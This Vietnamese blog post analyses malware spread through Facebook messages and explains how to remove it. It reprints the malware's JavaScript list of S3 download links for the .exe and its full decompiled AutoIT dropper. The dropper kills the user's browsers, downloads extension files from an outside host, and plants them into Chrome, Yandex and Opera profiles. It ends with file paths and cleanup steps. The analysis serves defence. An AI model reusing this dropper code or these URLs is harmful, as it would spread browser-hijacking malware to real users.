/ / / / Bài viết phân tích Analysis con malware lây nhiễm trên FB.

Bài viết phân tích Analysis con malware lây nhiễm trên FB.

Add Comment , , Edit




- Hiện tượng:
1. Nhắn tin nhắn tới danh sách bạn bè trên Facebook, với nội dung một đường link.
2. Khi nhấn vào đường link này sẽ download tệp tin .EXE về máy tính.
3. Khi chạy tệp tin xong, máy tính sẽ bị nhiễm và tiếp tục gửi tin.

Đường link có dạng sau:

https://9b102c9132fc2995f11f-90f5b1ca4ed...#ref=93740

Tin nhắn đến sẽ có hình avatar của người được nhận.


Mã:
var exeler = ["https://s3-us-west-2.amazonaws.com/yeslanw232323sdsdsd2sds13/video_watching_mp4_facebook_12222333232122233sd29000421003.exe","https://s3-us-west-2.amazonaws.com/sadask2323s/video_watching_mp4_facebook_1222233323212233sd29000421003.exe","https://s3-us-west-2.amazonaws.com/sadsak2k323s/video_watching_mp4_facebook_122223332322233sd2900042003.exe","https://s3-us-west-2.amazonaws.com/sadsadk21k323s/video_watching_mp4_facebook_1222323222332900042003.exe","https://s3-us-west-2.amazonaws.com/bakbakbak323/video_watching_mp4_facebook_122223332322233sd29000421003.exe","https://s3-us-west-2.amazonaws.com/sadsad21323ss/video_watching_mp4_facebook_133290004003.exe","https://s3-us-west-2.amazonaws.com/sdskdk213s/video_watching_mp4_facebook_12233290004003.exe","https://s3-us-west-2.amazonaws.com/bakbakwsd21323/video_watching_mp4_facebook_122332900042003.exe","https://s3-us-west-2.amazonaws.com/23sds123s/video_watching_mp4_facebook_12222332900042003.exe"];var exem = exeler[Math.floor(Math.random() * (exeler.length))];

Như vậy, là nó tự động download một trong các tệp tin trên về máy tính, người nào thực thi sẽ tự cài đặt nó lên máy tính. Hiện tại, tôi đã gặp ít nhất là 2 mẫu loại này lây nhiễm trên máy tính. malware này được viết bằng autoIT. reverse ta được.


Mã:
Local $chrxxxx1 = "C"Local $chrxxxx2 = "h"Local $chrxxxx3 = "r"Local $chrxxxx4 = "o"Local $chrxxxx5 = "m"Local $chrxxxx6 = "e"Local $chrxxxx = $chrxxxx1 & $chrxxxx2 & $chrxxxx3 & $chrxxxx4 & $chrxxxx5 & $chrxxxx6Local $browxs1 = "b"Local $browxs2 = "r"Local $browxs3 = "o"Local $browxs4 = "w"Local $browxs5 = "s"Local $browxs6 = "e"Local $browxs7 = "r"Local $browxs = $browxs1 & $browxs2 & $browxs3 & $browxs4 & $browxs5 & $browxs6 & $browxs7Local $extsd1 = "E"Local $extsd2 = "x"Local $extsd3 = "t"Local $extsd4 = "e"Local $extsd5 = "n"Local $extsd6 = "s"Local $extsd7 = "i"Local $extsd8 = "o"Local $extsd9 = "n"Local $extsd0 = "s"Local $extsd = $extsd1 & $extsd2 & $extsd3 & $extsd4 & $extsd5 & $extsd6 & $extsd7 & $extsd8 & $extsd9 & $extsd0If ProcessExists("" & $chrxxxx & ".exe") Then    ProcessClose("" & $chrxxxx & ".exe")EndIfIf ProcessExists("" & $browxs & ".exe") Then    ProcessClose("" & $browxs & ".exe")EndIfIf ProcessExists("opera.exe") Then    ProcessClose("opera.exe")EndIfSleep(100)Local $okanid = BinaryToString(InetRead("http://www.patronbayi.com/class.php?idver=true"))DirCreate(@UserProfileDir & "\AppData\Local\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid)DirCreate(@UserProfileDir & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid)DirCreate(@UserProfileDir & "\AppData\Roaming\Opera Software\Opera Stable\" & $extsd & "\" & $okanid)DirCreate("C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid)DirCreate("C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid)DirCreate("C:\Documents and Settings\" & @UserName & "\Application Data\Opera Software\Opera Stable\" & $extsd & "\" & $okanid)DirCreate(@UserProfileDir & "\file_shared_xs\")Sleep(100)InetGet("http://www.patronbayi.com/Preferences", @UserProfileDir & "\file_shared_xs\Preferences", 9)Sleep(50)If NOT FileSetAttrib(@UserProfileDir & "\file_shared_xs\Preferences", "+R") ThenEndIfInetGet("http://www.patronbayi.com/ext/background.js", @UserProfileDir & "\file_shared_xs\background.js", 9)InetGet("http://www.patronbayi.com/manifest.json", @UserProfileDir & "\file_shared_xs\manifest.json", 9)FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", @UserProfileDir & "\AppData\Local\Google\" & $chrxxxx & "\User Data\Default\Preferences", 9)FileCopy(@UserProfileDir & "\file_shared_xs\background.js", @UserProfileDir & "\AppData\Local\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid & "\background.js", 9)FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", @UserProfileDir & "\AppData\Local\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid & "\manifest.json", 9)FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", @UserProfileDir & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\Preferences", 9)FileCopy(@UserProfileDir & "\file_shared_xs\background.js", @UserProfileDir & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid & "\background.js", 9)FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", @UserProfileDir & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid & "\manifest.json", 9)FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", @UserProfileDir & "\AppData\Roaming\Opera Software\Opera Stable\Preferences", 9)FileCopy(@UserProfileDir & "\file_shared_xs\background.js", @UserProfileDir & "\AppData\Roaming\Opera Software\Opera Stable\" & $extsd & "\" & $okanid & "\background.js", 9)FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", @UserProfileDir & "\AppData\Roaming\Opera Software\Opera Stable\" & $extsd & "\" & $okanid & "\manifest.json", 9)FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Google\" & $chrxxxx & "\User Data\Default\Preferences", 9)FileCopy(@UserProfileDir & "\file_shared_xs\background.js", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid & "\background.js", 9)FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid & "\manifest.json", 9)FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\Preferences", 9)FileCopy(@UserProfileDir & "\file_shared_xs\background.js", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid & "\background.js", 9)FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid & "\manifest.json", 9)FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", "C:\Documents and Settings\" & @UserName & "\Application Data\Opera Software\Opera Stable\Preferences", 9)FileCopy(@UserProfileDir & "\file_shared_xs\background.js", "C:\Documents and Settings\" & @UserName & "\Application Data\Opera Software\Opera Stable\" & $extsd & "\" & $okanid & "\background.js", 9)FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", "C:\Documents and Settings\" & @UserName & "\Application Data\Opera Software\Opera Stable\" & $extsd & "\" & $okanid & "\manifest.json", 9)Sleep(100)ShellExecute("" & $chrxxxx & ".exe")

Như vậy, nó gửi http tới

Mã:
www.patronbayi.com GET /class.php?idver=true HTTP/1.1www.patronbayi.com GET /Preferences HTTP/1.1www.patronbayi.com GET /ext/background.js HTTP/1.1www.patronbayi.com GET /manifest.json HTTP/1.1

có nhiều nơi lưu tệp tin thực thi khác nhau, nhưng tôi tìm thấy 2 vị trí được lưu là:

Mã:
C:\TEST\sample.exe và%appdata%sysreg.exeC:\User\[username]\Program Data\sysreg.exeC:\f_install.exe

Các bạn seach các tệp .EXE trên và xóa đi, sau đó tìm kiếm các thư mục sau:

Mã:
C:\Documents and Settings\User\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\ExtensionsC:\Documents and Settings\User\Local Settings\Application Data\Yandex\YandexBrowser\User Data\DefaultC:\Documents and Settings\User\Local Settings\Application Data\Yandex\YandexBrowser\User DataC:\Documents and Settings\User\Local Settings\Application Data\Yandex\YandexBrowserC:\Documents and Settings\User\Local Settings\Application Data\YandexC:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\User Data\Default\ExtensionsC:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\User Data\DefaultC:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\User DataC:\Documents and Settings\User\Local Settings\Application Data\Google\ChromeC:\Documents and Settings\User\Local Settings\Application Data\GoogleC:\Documents and Settings\User\file_shared_xsC:\Documents and Settings\User\Application Data\Opera Software\Opera Stable\ExtensionsC:\Documents and Settings\User\Application Data\Opera Software\Opera StableC:\Documents and Settings\User\Application Data\Opera SoftwareC:\Documents and Settings\User\AppData\Roaming\Opera Software\Opera Stable\ExtensionsC:\Documents and Settings\User\AppData\Roaming\Opera Software\Opera StableC:\Documents and Settings\User\AppData\Roaming\Opera SoftwareC:\Documents and Settings\User\AppData\RoamingC:\Documents and Settings\User\AppData\Local\Yandex\YandexBrowser\User Data\Default\ExtensionsC:\Documents and Settings\User\AppData\Local\Yandex\YandexBrowser\User Data\DefaultC:\Documents and Settings\User\AppData\Local\Yandex\YandexBrowser\User DataC:\Documents and Settings\User\AppData\Local\Yandex\YandexBrowserC:\Documents and Settings\User\AppData\Local\YandexC:\Documents and Settings\User\AppData\Local\Google\Chrome\User Data\Default\ExtensionsC:\Documents and Settings\User\AppData\Local\Google\Chrome\User Data\DefaultC:\Documents and Settings\User\AppData\Local\Google\Chrome\User DataC:\Documents and Settings\User\AppData\Local\Google\ChromeC:\Documents and Settings\User\AppData\Local\GoogleC:\Documents and Settings\User\AppData\LocalC:\Documents and Settings\User\AppData

Xóa cả thư mục hoặc 3 tệp tin sau: Preferences, background.js, manifest.json

Hiện tại, mẫu malware này vẫn tiếp tục cập nhật phiên bản mới. Các bạn thường xuyên theo dõi topic để xóa virus. Nếu cần thiết, tôi sẽ viết chương trình để xóa toàn bộ virus khỏi máy nếu có nhiều người mắc phải loại này.  

Tác giả : Hoàng Cường
SHARE

About Admin

    Blogger Comment
    Facebook Comment

0 nhận xét:

Đăng nhận xét

Đăng ký: Đăng Nhận xét ( Atom )